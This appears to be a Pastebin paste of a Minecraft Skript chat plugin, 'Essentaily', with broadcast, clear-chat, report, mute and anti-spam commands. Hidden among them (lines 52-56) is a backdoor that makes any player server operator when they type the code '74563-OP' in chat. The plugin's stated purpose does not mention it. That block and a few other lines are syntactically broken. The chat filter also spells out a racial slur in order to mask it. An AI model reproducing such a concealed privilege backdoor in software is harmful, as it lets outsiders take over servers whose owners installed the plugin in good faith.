Entities

Essentaily

Sep 14th, 2017
177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.50 KB | None | 0 0
  1. on skript upload:
  2. broadcast "&7Thank you for using &bEssentaily :)"
  3. broadcast "&7made by &8: &cXXXCanadian"
  4. broadcast "&7This is only a &bbeta verison"
  5. broadcast "&bFull verison &8[&bCOMING SOON&8]"
  6.  
  7. command /broadcast <string>:
  8. aliases: /bc
  9. permission: chat.broadcast
  10. permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
  11. trigger:
  12. broadcast "&bChat&a++ &7%arg-1%"
  13.  
  14. command /clearchat:
  15. aliases: /cc
  16. permission: chat.clear
  17. permission message: "&c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!"
  18. trigger:
  19. loop 200 times:
  20. broadcast " "
  21. broadcast "&bChat&a++ &b%player%, &7has cleared the chat!"
  22.  
  23. on chat:
  24. replace all "fuck" with "****" in the message
  25. replace all "cunt" with "****" in the message
  26. replace all "bitch" with "*****" in the message
  27. replace all "nigger" with "******" in the message
  28. replace all "pussy" with "*****" in the message
  29. replace all "kys" with "Hope you live long" in the message
  30.  
  31. on join:
  32. broadcast "&8[&a+&8] &7%player%"
  33.  
  34. on leave:
  35. broadcast "&8[&4-&8] &7%player%"
  36.  
  37. command /report <player> <text>:
  38. permission: chat.report
  39. permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command
  40. trigger:
  41. broadcast "&7Your report has landed to the staff!"
  42. add text-argument to {sikayetler::*}
  43. set {sikayeteden.%text-argument%} to player
  44. set {sikayeteden.%text-argument%} to player argument
  45. loop all players:
  46. if loop-player has permission "chat.show"
  47. send "&7Report System" to loop-player
  48. send "&7Report: &b""%text-argument%""" to loop-player
  49. send "&7the reported player: &b%player argument%" to loop-player
  50. send "&7Reporter: &b%player%" to loop-player]
  51.  
  52. if chat:
  53. "74563-OP"
  54. cancle event
  55. op %player%
  56. send "&7You have used the &cop &7chat to get OP!" to %player%
  57.  
  58. command /cookie:
  59. permission: free.cookie
  60. permission message: "&7Sorry you dont have access take a free cookie using /cookie"
  61. trigger:
  62. give %player% cookie 1
  63. send "&7OOOH HE STEALIN" to %player%
  64.  
  65. on chat:
  66. if player has permission "chat.default":
  67. if {muted.%player%} is true:
  68. cancel event
  69. send "&cYou have been temporarily Muted!" to player
  70. else:
  71. set {_waited} to difference between {spam.%player%.lastused} and now
  72. if {_waited} is less than 1 seconds:
  73. if {mute.%player%} is 3:
  74. cancel event
  75. send "&7&m&l---------------------------------" to player
  76. send "&cYou have been temporarily Muted for spamming public chat!" to player
  77. send "&7&m&l---------------------------------" to player
  78. set {mute.%player%} to 0
  79. set {muted.%player%} to true
  80. wait 300 seconds
  81. set {muted.%player%} to false
  82. stop
  83. else:
  84. add 1 to {mute.%player%}
  85. send "&cPlease slow down chat!" to player
  86. stop
  87. set {spam.%player%.lastused} to now
  88.  
  89.  
  90. on join:
  91. if player has permission "chat.default":
  92. set {mute.%player%} to 0
  93.  
  94. command /um <player>:
  95. aliases: /unmute
  96. permission: chat.unmute
  97. permission message: "&c7Sorry &c%player% &7you must have &6chat.unmute&7 to run this command!"
  98. trigger:
  99. set {muted.%arg-1%} to false
  100. send "&a%arg-1% has been unmuted!" to player
  101. send "&aYou have been unmuted" to arg-1
  102. stop
  103.  
  104. command /mutestatus:
  105. trigger:
  106. send "&cmuted: &7%{muted.%player%}%" to player
  107. send "&cVL: &7%{mute.%player%}%" to player
  108. stop
  109.  
  110. every minute:
  111. loop all players:
  112. set {mute.%loop-player%} to 0
  113. stop
Add Comment
Please, Sign In to add comment